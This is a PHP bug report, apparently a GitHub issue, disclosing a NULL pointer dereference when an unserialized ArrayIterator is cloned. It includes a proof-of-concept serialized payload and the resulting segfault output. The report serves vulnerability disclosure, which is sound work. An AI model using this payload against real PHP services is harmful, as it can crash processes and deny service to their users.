The unserialize function with ArrayIterator leads to NULL pointer dereference when object cloned

[012git012]

Description

Version: PHP 8.6.0-dev (cli) (built: May 13 2026 08:43:46) (NTS DEBUG)
Researcher: Igor Sak-Sakovskiy (Positive Technologies)

Language assembly and compilation.
Listing 1. Language assembly and compilation.

$ git clone https://github.com/php/php-src.git
$ cd php-src
$ ./buildconf
$ ./configure
$ make -j8
$ ./sapi/cli/php -v
PHP 8.6.0-dev (cli) (built: May 13 2026 08:43:46) (NTS DEBUG)
Copyright © The PHP Group and Contributors
Zend Engine v4.6.0-dev, Copyright © Zend by Perforce
    with Zend OPcache v8.6.0-dev, Copyright ©, by Zend by Perforce

The source code.
Listing 2. The source code.

<?php
$payload = 'O:13:"ArrayIterator":3:{'
    . 's:1:"0";i:0;'
    . 's:1:"1";a:0:{}'
    . 's:1:"2";a:2:{i:0;i:0;i:1;i:0;}'
    . '}';

$obj = unserialize($payload);  // Successful unserialization
$clone = clone $obj;            // Segmentation fault
?>

Executing this PHP code results in Segmentation fault due to corrupted pointer access, leading to Denial of Service (DoS).
Listing 3.

$ ./php-src/sapi/cli/php poc.php

Deprecated: Creation of dynamic property ArrayIterator::$0 is deprecated in /home/administrator/Temp/poc.php on line 8

Deprecated: Creation of dynamic property ArrayIterator::$1 is deprecated in /home/administrator/Temp/poc.php on line 8
Segmentation fault (core dumped)

NULL pointer dereference leads to process crash, causing Denial of Service. In ZTS mode, this can stop all currently served requests in the process.

PHP Version

PHP 8.6.0-dev (cli) (built: May 13 2026 08:43:46) (NTS DEBUG)

Operating System

No response

[DanielEScherzer]

Exists since at least 8.3, https://3v4l.org/SVARn#v